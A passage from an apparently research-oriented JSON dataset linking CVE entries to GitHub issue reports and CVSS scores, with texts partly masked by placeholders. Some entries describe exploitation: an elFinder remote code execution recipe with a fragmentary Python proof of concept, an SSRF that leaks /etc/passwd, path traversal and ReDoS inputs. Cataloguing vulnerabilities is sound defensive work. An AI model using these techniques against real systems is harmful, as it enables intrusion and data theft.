        "description": "splines: segfault due to out of bounds access of segment array. Hello, this NUMBERTAG byte JPEG XL image, found via fuzz testing, causes a segfault during decoding (using the latest commit on the main branch). FILETAG ERRORTAG It looks like, when drawing spline segments, APITAG for this image contains NUMBERTAG entries but APITAG can return higher values for y that result in APITAG reading beyond the end of this. URLTAG The following patch to APITAG demonstrates a possible guard to prevent the segfault, but there's almost certainly a better way to fix this. CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.4,
        "impactScore": 2.5,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-22873",
        "Issue_Url_old": "https://github.com/revive-adserver/revive-adserver/issues/1068",
        "Issue_Url_new": "https://github.com/revive-adserver/revive-adserver/issues/1068",
        "Repo_new": "revive-adserver/revive-adserver",
        "Issue_Created_At": "2019-06-24T06:42:33Z",
        "description": "open redirect (oadest url) FILETAG revive NUMBERTAG dear all, we've found bug in our revive about FILETAG (oadest) FILETAG > it will be redirect to url destination we read this url FILETAG that we should upgrade version, but this bug (as we think is a bug) still can open redirect this is issue will harm our site and the victims could be redirect to phissing website could you guide us what we should do again, even after upgrade version NUMBERTAG still can open redirect",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-22877",
        "Issue_Url_old": "https://github.com/nextcloud/server/issues/24600",
        "Issue_Url_new": "https://github.com/nextcloud/server/issues/24600",
        "Repo_new": "nextcloud/server",
        "Issue_Created_At": "2020-12-07T21:33:05Z",
        "description": "Wrong (malformed) external storage credentials saved in APITAG . APITAG Hello! I am using Nextcloud NUMBERTAG in docker with LDAP auth + external storage and with several external SMB mounts (all with \"credentials saved in database\" enabled). It seems that the credentials saved in the corrspondeing table ( APITAG ) are wrong and therefore all SMB shares are showing errors. When I initially add the external storage SMB mounts in the settings and then a user logs in the first time, the SMB shares work (with the correct login) which gets correctly saved in the DB. Afterwards I can find one single entry on the APITAG table However, when I (as an admin) navigate to: APITAG the APITAG table gets populated with all the users (and some random credentials) this also includes all users who wasn\u00b4t ever logged in in nextcloud. When the user logs in afterward the credentials entry is already there and does not get updated. Steps to reproduce NUMBERTAG Add external SMB mount with option \"credentials saved in database NUMBERTAG Manually check the MYSQL table APITAG it should be empty NUMBERTAG As an admin: navigate to ( APITAG NUMBERTAG Recheck the MYSQL table APITAG there is an entry for every user now NUMBERTAG Login as new user and try to access a SMB share access denied. Expected behaviour NUMBERTAG Do not populate the table APITAG on \"user list settings page NUMBERTAG If the current user credentials does not match the ones in the DB > update it Actual behaviour Tell us what happens instead Debugging results In the file APITAG : When I output the APITAG on each request I get two results: for the admin user listing all users on the settings page: there is a full browser page with binary crap printed. while logged in with the specific user it prints the actual loginame of that user Bugfix APITAG When I change APITAG : from APITAG to APITAG it works correctly. With thix change the credentials gets stored on every request and therefore the wrong (initialized) ones getting overwritten. Server configuration I am using this docker image (no modifications): URLTAG Operating system: Docker on Ubuntu NUMBERTAG LTS Web server: nginx with php fpm Database: mariadb NUMBERTAG as docker container PHP version NUMBERTAG php NUMBERTAG Nextcloud version NUMBERTAG Updated from an older APITAG or fresh install: updated from nextcloud NUMBERTAG in one go) Where did you install Nextcloud from: Signing status: APITAG APITAG status APITAG ERRORTAG APITAG List of activated apps: APITAG APITAG list APITAG Enabled: accessibility NUMBERTAG activity NUMBERTAG cloud_federation_api NUMBERTAG comments NUMBERTAG da NUMBERTAG drawio NUMBERTAG external NUMBERTAG extract NUMBERTAG federatedfilesharing NUMBERTAG federation NUMBERTAG files NUMBERTAG files_external NUMBERTAG files_linkeditor NUMBERTAG files_pdfviewer NUMBERTAG files_rightclick NUMBERTAG files_sharing NUMBERTAG files_trashbin NUMBERTAG files_versions NUMBERTAG files_videoplayer NUMBERTAG logreader NUMBERTAG lookup_server_connector NUMBERTAG metadata NUMBERTAG notifications NUMBERTAG oauth NUMBERTAG photos NUMBERTAG provisioning_api NUMBERTAG ransomware_protection NUMBERTAG settings NUMBERTAG sharebymail NUMBERTAG socialsharing_email NUMBERTAG text NUMBERTAG theming NUMBERTAG theming_customcss NUMBERTAG twofactor_backupcodes NUMBERTAG APITAG NUMBERTAG twofactor_totp NUMBERTAG twofactor_u2f NUMBERTAG updatenotification NUMBERTAG user_ldap NUMBERTAG iewer NUMBERTAG workflowengine NUMBERTAG Disabled: admin_audit contactsinteraction dashboard encryption firstrunwizard nextcloud_announcements password_policy privacy recommendations serverinfo spreed support survey_client systemtags user_status weather_status APITAG Nextcloud configuration: APITAG APITAG report APITAG ERRORTAG APITAG Are you using external storage, if yes which one: SMB Are you using encryption: no encryption at rest Are you using an external user backend, if yes which one: LDAP LDAP configuration (delete this part if not used) APITAG APITAG LDAP config APITAG ERRORTAG APITAG Client configuration Browser: Chromoum NUMBERTAG Operating system: APITAG NUMBERTAG Logs In the nextcloud log section you can find the log of the initial user login who gets \"denied\" on the SMB storage due to wrong stored credentials. Nextcloud log APITAG APITAG APITAG log APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for APITAG ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-23158",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/414",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/414",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-01-26T08:44:03Z",
        "description": "APITAG double free in function pspdf_export ps APITAG Hello, While fuzzing htmldoc , I found a double free in pspdf_export test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23165",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/413",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/413",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-01-26T08:39:00Z",
        "description": "APITAG heap buffer overflow in APITAG in ps APITAG Hello, While fuzzing htmldoc , I found a heap buffer overflow in the APITAG ,in ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23180",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/418",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/418",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-01-26T09:02:25Z",
        "description": "APITAG SEGV in file_extension APITAG Hello, While fuzzing htmldoc , I found aSEGV in file_extension function in APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-23191",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/415",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/415",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-01-26T08:50:41Z",
        "description": "APITAG SEGV on unknown address NUMBERTAG Hello, While fuzzing htmldoc , I found SEGV on unknown address test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-23206",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/416",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/416",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-01-26T08:54:36Z",
        "description": "APITAG stack buffer overflow in parse_table ps APITAG Hello, While fuzzing htmldoc , I found a stack buffer overflow in APITAG ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-23330",
        "Issue_Url_old": "https://github.com/bitovi/launchpad/issues/123",
        "Issue_Url_new": "https://github.com/bitovi/launchpad/issues/123",
        "Repo_new": "bitovi/launchpad",
        "Issue_Created_At": "2020-06-19T16:59:31Z",
        "description": "Security Notice & Bug Bounty Remote Code Execution APITAG This issue has been generated on behalf of Mik NUMBERTAG URLTAG Overview launchpad URLTAG allows you to launch browsers! With APITAG The issue occurs because a user input is formatted inside a command that will be executed without any check. Bug Bounty We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded \ud83d\udcb0? Go to FILETAG We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to URLTAG \ud83d\udcda APITAG generated by APITAG helper..._",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23341",
        "Issue_Url_old": "https://github.com/PrismJS/prism/issues/2583",
        "Issue_Url_new": "https://github.com/prismjs/prism/issues/2583",
        "Repo_new": "prismjs/prism",
        "Issue_Created_At": "2020-10-11T13:08:45Z",
        "description": "APITAG in prism. Hi, I would like to report NUMBERTAG APITAG vulnerabilities in prism ( URLTAG \u200b). It allows cause a denial of service if highlighting crafted codes. The first APITAG The vulnerable regular expression is APITAG and is located in URLTAG The APITAG vulnerability can be exploited with the following crafted code string ERRORTAG The second APITAG The vulnerable regular expression is APITAG and is located in URLTAG \u200b The APITAG vulnerability can be exploited with the following crafted code string\u200b APITAG The third APITAG The vulnerable regular expression is APITAG and is located in URLTAG \u200b The APITAG vulnerability can be exploited with the following crafted code string\u200b CODETAG The fourth APITAG The vulnerable regular expression is APITAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG ) PATHTAG ) \\] CODETAG APITAG APITAG (^[^\\S ] ) (?: ?| )(?:. (?: ?| )) ?[^\\S ] PATHTAG CODETAG \u200b APITAG ((?:^|[&(])[ ] )if(?: ?\\/[a z?](?:[ : ?:\"[^\"] \"|\\S+))? (?:not )?(?:cmdextversion \\d+|defined \\w+|errorlevel \\d+|exist \\S+|(?:\"[^\"] \"|\\S+)?(?:==| (?:equ|neq|lss|leq|gtr|geq) )(?:\"[^\"] \"|\\S+)) CODETAG 'if NUMBERTAG CODETAG APITAG in the root directory NUMBERTAG Input the above crafted code strings and select the corresponding languages",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23343",
        "Issue_Url_old": "https://github.com/jbgutierrez/path-parse/issues/8",
        "Issue_Url_new": "https://github.com/jbgutierrez/path-parse/issues/8",
        "Repo_new": "jbgutierrez/path-parse",
        "Issue_Created_At": "2021-02-09T06:59:32Z",
        "description": "APITAG in path parse. Hi, I would like to report two Regular Expression Denial of Service APITAG vulnerabilities in APITAG . It allows cause a denial of service when parsing crafted invalid paths. You can execute the code below to reproduce the vulnerability.\u200b ERRORTAG Feel free to contact me if you have any questions. Best regards, Yeting Li\u200b\u200b\u200b\u200b",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23345",
        "Issue_Url_old": "https://github.com/thecodingmachine/gotenberg/issues/261",
        "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/261",
        "Repo_new": "gotenberg/gotenberg",
        "Issue_Created_At": "2020-11-24T19:30:47Z",
        "description": "Server Side Request Forgery APITAG (in version NUMBERTAG Expected Behavior When attempting to convert html into a PDF using the /html endpoint, gotenberg should throw an exception (respond with a bad request) whenever there is an attempt to convert html with a source (src) reference to an internal system file. FILETAG FILETAG Possible Solution Respond with a bad request. Or something that indicates the requested operation is not allowed or prohibited. Check the contents of the HTML file being uploaded to determine if similar file:// protocols are referenced The use of server side requests must be limited to specific scenarios required by the application and servers must be hardened to only allow those requests. SSRF can be remediated using a variety of standard web application protections, such as NUMBERTAG Limit service types via input validation on user input: Analyze if the application must use URI/ URL in requests and if not, disallow them. When a use case requires URIs and URLs in requests, perform input validation on URI/URLs using whitelists or robust blacklists. For example, only allow URL schemes such as HTTP/HTTPS which are often required for accessing applications. Disable all other URL schemas such as file://, dict://, gopher://, ftp://. Alternatively, create a token based forwarding for SSRs which may eliminate the use of URIs altogether NUMBERTAG Limit service interactions: Carefully analyze if the server requires interactions with external servers. Based on the use case, prevent unintended behavior in one of the following ways: External service interactions required: If the server is to perform interactions with external services, the server must be hardened to safely eliminate calls to services available on the local loopback adapter and prevent any calls from the server to other internal systems NUMBERTAG External service interactions not required: If the server is to only interact with local services, configure outbound firewall rules to check any calls being made from the application. The rules must limit the web server's interaction with other hosts by routing traffic only to specified resources on the local network; i.e., web servers must disallow connections to any host not included in the whitelist. Steps to Reproduce (for bugs NUMBERTAG Configure Postman to use a proxy tool such as Burp Suite NUMBERTAG Create an HTML file using the below data: test blank html APITAG NUMBERTAG Toggle Burp Intercept on NUMBERTAG Upload this HTML file and make a request to the APITAG endpoint NUMBERTAG Forward the intercepted request to Repeater and hit send NUMBERTAG In Repeater > response section, right click and select \"show response in browser NUMBERTAG Open the response in a browser NUMBERTAG Note that the PDF file contains contents of /etc/passwd file. FILETAG FILETAG Context We'd like to hide information about the server and not allow attackers to steal sensitive data Your Environment Azure Linux Container OS version: Uni NUMBERTAG bit system: True NUMBERTAG bit process: True Processor count NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23351",
        "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/69",
        "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/69",
        "Repo_new": "pires/go-proxyproto",
        "Issue_Created_At": "2021-02-28T20:09:28Z",
        "description": "APITAG is not secure. ERRORTAG The reader is a default APITAG wrapping a APITAG . It will read from the connection until it finds a newline. Since no limits are implemented in the code, a deliberately malformed NUMBERTAG header could be used to exhaust memory in a server process using this code a form of APITAG The exploit is simple: send a stream starting with \"PROXY\" and keep sending data (which does not contain a newline) until the target stops acknowledging. In most real world circumstances, the actual risk is small since only trusted sources should be allowed to send proxy protocol headers. However, this is still a security issue and should be resolved. Easiest fix: APITAG and scan for a newline. If none is found, then it is not a valid version NUMBERTAG header anyway, so you can fail fast (the maximum NUMBERTAG header size is NUMBERTAG bytes). Otherwise, proceed with the APITAG in full confidence.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-23354",
        "Issue_Url_old": "https://github.com/adaltas/node-printf/issues/31",
        "Issue_Url_new": "https://github.com/adaltas/node-printf/issues/31",
        "Repo_new": "adaltas/node-printf",
        "Issue_Created_At": "2021-02-09T11:49:09Z",
        "description": "APITAG in printf. Hi, I would like to report two Regular Expression Denial of Service APITAG vulnerability in printf . It allows cause a denial of service when using crafted invalid formats. You can execute the code below to reproduce the vulnerability.\u200b ERRORTAG Feel free to contact me if you have any questions. Best regards, Yeting Li\u200b\u200b\u200b\u200b",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23357",
        "Issue_Url_old": "https://github.com/TykTechnologies/tyk/issues/3390",
        "Issue_Url_new": "https://github.com/tyktechnologies/tyk/issues/3390",
        "Repo_new": "tyktechnologies/tyk",
        "Issue_Created_At": "2020-11-17T23:13:51Z",
        "description": "Security: Path Traversal Bug Able to delete/modify arbitrary JSON files via management API. PATHTAG APITAG FILETAG Environment: On Prem, Linux Describe the bug The function at URLTAG is able to delete arbitrary JSON files on disk where Tyk is running via the management API. The APIID is provided by the user and this value is then used to create a file on disk. If there is a file found with the same name then it will be deleted and then re created with the contents of the API creation request. Assume I create an API with PATHTAG if there is a JSON file at that location called FILETAG , it will be deleted and replaced with the API definition object from my request. This means NUMBERTAG things: Actors are able to traverse the file system of the Tyk host Actors are able to delete and modify any JSON file on the Tyk host Reproduction steps Create a file outside of where Tyk is storing the API definitions eg FILETAG Make a request to create an API with APIID '../something' Observe file get deleted and then overwritten Actual behavior Tyk deletes/modifies arbitrary JSON files Expected behavior Tyk should not use user defined input as part of file names. Recommended that the API gateway maintains a mapping between APITAG and a gateway generated APITAG i.e. a UUID. APITAG N/A Logs (debug mode or log file): N/A Configuration (tyk config file): N/A Additional context N/A",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-23371",
        "Issue_Url_old": "https://github.com/wanasit/chrono/issues/382",
        "Issue_Url_new": "https://github.com/wanasit/chrono/issues/382",
        "Repo_new": "wanasit/chrono",
        "Issue_Created_At": "2021-03-07T23:45:58Z",
        "description": "parse hangs on a date like string with lots of embedded spaces. Trying to parse this string never returns. lt looks like catastrophic backtracking in the regex matching, probably due to all the embedded spaces CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23394",
        "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3295",
        "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3295",
        "Repo_new": "studio-42/elfinder",
        "Issue_Created_At": "2021-05-08T17:34:35Z",
        "description": "Remote Code Execution in APITAG NUMBERTAG create a .phar file using the following URL: FILETAG NUMBERTAG Add PHP code in the APITAG file by following GET request: URLTAG APITAG NUMBERTAG Execute the OS command with the privilege of the webserver: URLTAG Tested on apache and nginx webservers. By default it works in apache webserver and it requires .phar file to be executed as php code in nginx Python3 POC: import APITAG APITAG from pwn import import APITAG APITAG Chand\" APITAG APITAG def APITAG if APITAG APITAG python3 APITAG APITAG \") APITAG APITAG APITAG APITAG APITAG PATHTAG ) APITAG APITAG APITAG Za z NUMBERTAG for h in file_hash: APITAG APITAG PATHTAG APITAG &target=\"+hash_file) while True: cmd=raw_input(\"cmd>\") print(cmd) PATHTAG ()}\" res=wget(url, timeout NUMBERTAG APITAG if __name__==\"__main__\": APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23398",
        "Issue_Url_old": "https://github.com/AllenFang/react-bootstrap-table/issues/2071",
        "Issue_Url_new": "https://github.com/allenfang/react-bootstrap-table/issues/2071",
        "Repo_new": "allenfang/react-bootstrap-table",
        "Issue_Created_At": "2019-04-18T11:30:31Z",
        "description": "XSS when using APITAG function. Hi When using APITAG function and not converting the value to react component output is not sanitised. Therefore you can easily run XSS through it. Example: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-23400",
        "Issue_Url_old": "https://github.com/nodemailer/nodemailer/issues/1289",
        "Issue_Url_new": "https://github.com/nodemailer/nodemailer/issues/1289",
        "Repo_new": "nodemailer/nodemailer",
        "Issue_Created_At": "2021-05-22T22:32:40Z",
        "description": "Header injection vulnerability in address object. Please fill the following questionnaire about your issue NUMBERTAG What kind of issue are you reporting? x] A bug in Nodemailer [ ] A bug in a plugin of Nodemailer (eg. issues with nodemailer sendgrid) [ ] Feature request [ ] Looking for help to resolve some kind of problem with Nodemailer NUMBERTAG Are you listed as a sponsor of Nodemailer project (see Sponsors button above)? [ ] Yes. Sponsors get priority support [x] No. Unless it is a bug in Nodemailer you might find support from public forums like APITAG URLTAG NUMBERTAG State your problem here: I've got a pretty standard APITAG call here in an HTTP handler: CODETAG An address that contains line breaks can add arbitrary SMTP headers. In my mind, the reason for using an address object is to avoid having to deal with escaping odd names and addresses (like would be necessary with APITAG NUMBERTAG name} APITAG NUMBERTAG APITAG ); therefore, it is expected that name and address don't have to be sanitized. Otherwise, it's not just an address object, but an \"address plus maybe arbitrary headers,\" which is not something anyone would _want_ to have. I'm not sure what other fields are vulnerable. This was discovered by APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-23409",
        "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/65",
        "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/65",
        "Repo_new": "pires/go-proxyproto",
        "Issue_Created_At": "2021-01-27T15:03:03Z",
        "description": "Add Support for APITAG This library seems to lean heavily on inspiration from URLTAG That library supports passing in a timeout when you define the listener: APITAG It would be nice if the same feature, or a similar feature was possible with this library.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23409",
        "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/75",
        "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/75",
        "Repo_new": "pires/go-proxyproto",
        "Issue_Created_At": "2021-07-13T07:56:23Z",
        "description": "APITAG is setting a hard timeout on connections regardless of header sending. I think this setting is supposed to timeout connections that are not sending the headers and terminate them after this amount of time. However, I set the setting to NUMBERTAG seconds, and the result is that all connections are terminated after NUMBERTAG seconds, even if they correctly sent the headers. The connection starts up, but is then abruptly ended after the NUMBERTAG seconds are passed. I think what is missing in NUMBERTAG is a call to APITAG to reset the timeout after the proxy header was sent successfully.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23418",
        "Issue_Url_old": "https://github.com/nicolargo/glances/issues/1025",
        "Issue_Url_new": "https://github.com/nicolargo/glances/issues/1025",
        "Repo_new": "nicolargo/glances",
        "Issue_Created_At": "2017-02-06T17:11:26Z",
        "description": "Security audit. Description >> Issue: [B NUMBERTAG blacklist] Using Fault to parse untrusted XML data is known to be vulnerable to XML attacks. Use APITAG function to monkey patch xmlrpclib and mitigate XML vulnerabilities. Severity: High Confidence: High Location: APITAG NUMBERTAG from APITAG import APITAG APITAG NUMBERTAG from xmlrpclib import Fault, ERRORTAG APITAG Transport NUMBERTAG from urllib2 import urlopen, ERRORTAG Versions Glances (glances NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23442",
        "Issue_Url_old": "https://github.com/tony-tsx/cookiex-deep/issues/1",
        "Issue_Url_new": "https://github.com/tony-tsx/cookiex-deep/issues/1",
        "Repo_new": "tony-tsx/cookiex-deep",
        "Issue_Created_At": "2021-09-06T06:29:37Z",
        "description": "APITAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG APITAG URLTAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23446",
        "Issue_Url_old": "https://github.com/handsontable/handsontable/issues/8752",
        "Issue_Url_new": "https://github.com/handsontable/handsontable/issues/8752",
        "Repo_new": "handsontable/handsontable",
        "Issue_Created_At": "2021-09-27T08:57:20Z",
        "description": "Fix APITAG vulnerability and clean up major code smells. Description Steps to reproduce NUMBERTAG Demo URLTAG Your environment Handsontable version: Browser Name and version: Operating System:",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23448",
        "Issue_Url_old": "https://github.com/jarradseers/config-handler/issues/1",
        "Issue_Url_new": "https://github.com/jarradseers/config-handler/issues/1",
        "Repo_new": "jarradseers/config-handler",
        "Issue_Created_At": "2021-08-15T13:34:55Z",
        "description": "Vulnerable to Prototype Pollution. Hey i recently found that your package is vulnerable to Prototype Pollution. FILETAG APITAG FILETAG APITAG _output_ polluted",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23449",
        "Issue_Url_old": "https://github.com/patriksimek/vm2/issues/363",
        "Issue_Url_new": "https://github.com/patriksimek/vm2/issues/363",
        "Repo_new": "patriksimek/vm2",
        "Issue_Created_At": "2021-09-07T09:20:16Z",
        "description": "Sandbox breakout. Hi, I would like to report a sandbox breakout, but I believe this should be done in a responsible, private way. Please create a security policy and an advisory, as instructed here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23556",
        "Issue_Url_old": "https://github.com/Guake/guake/issues/1796",
        "Issue_Url_new": "https://github.com/guake/guake/issues/1796",
        "Repo_new": "guake/guake",
